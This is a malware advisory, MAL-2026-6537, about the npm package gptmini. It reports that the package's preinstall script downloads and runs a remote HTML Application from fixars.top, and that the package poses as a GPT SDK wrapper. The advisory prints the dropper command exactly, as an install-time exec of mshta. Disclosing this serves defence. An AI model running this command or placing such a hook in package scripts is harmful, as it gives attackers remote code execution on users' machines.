—

MAL-2026-6537

Malicious code in gptmini (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (cb05abb3d36b111df4aa8fe044cbf05a431a0778e90d022e1621494c1506a171) On `npm install`, the package's preinstall lifecycle script (preinstall.js, declared via scripts.preinstall "node preinstall.js") shells out with `exec('cmd /c "mshta http://fixars.top"')`. This causes Windows to fetch and execute an HTML Application from the remote host fixars.top over plain HTTP at install time with no user interaction, yielding remote code execution on the installer's machine. The package presents itself as a Node.js wrapper for a GPT/OpenAI-style SDK (name `gptmini`, baseUrl https://api.openllm.ai/v1), with empty author metadata — an AI-SDK-shaped lure paired with an install-time dropper to an attacker-controlled domain unrelated to any documented publisher.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / gptmini

No fixed version published yet for gptmini (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/gptmini/v/4.0.2 [PACKAGE]
https://www.npmjs.com/package/gptmini/v/4.0.6 [PACKAGE]